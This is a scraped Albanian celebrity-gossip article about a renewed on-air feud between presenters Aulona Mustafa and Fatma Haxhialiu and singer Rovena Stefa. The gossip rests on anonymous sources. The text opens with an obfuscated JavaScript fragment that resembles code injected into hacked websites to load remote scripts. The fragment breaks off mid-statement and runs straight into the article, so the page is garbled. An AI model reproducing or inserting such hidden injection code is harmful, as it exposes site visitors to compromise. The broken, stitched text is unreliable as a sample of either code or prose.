;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Historia përsëritet: Aulona dhe Fatma përballen me Rovena Stefën!

By

Një nga sherret më të bujshme në showbiz-in shqiptar është padyshim ai i dyshes prej moderatoreve Aulona Mustafa dhe Fatma Haxhialiu me këngëtaren e njohur, Rovena Stefa.

E gjitha nisi me komentet e dyshes thumbuese për klipin asokohe të ri, të Rovenës.

Komentet e Aulonës dhe Fatmës nuk u pritën mirë nga këngëtarja, e cila nuk qëndroi duarkryq, por i paditi të dyja për prishje imazhi.

Të tria u përballën edhe në “Zonë e Lirë” të Arjan Çanit e më pas edhe në gjykatë.

Por, papritmas çështja u pushua, për arsye të cilët nuk u morën vesh kurrë.  Çështja pushoi, por jo marrëdhënia e tensionuar mes palëve.

E ky tension duket se vazhdon edhe ditët e sotme.

Burime për Prive kane thëne se Aulona, Fatma dhe Rovena janë parë në ambientet e televizionit Klan në Shqipëri, duke debatuar me tone të ashpra dhe tepër të larta e duke tërhequr vëmendjen e personave që gjendeshin përreth.

Nuk dihen akoma arsyet se pse vajzat janë përballur sërish në televizionin Klan, por me shumë mundësi raportet jo të mira prej vitesh kanë dhënë “frytet” e tyre. /Prive.al

Artikuj të ngjashëm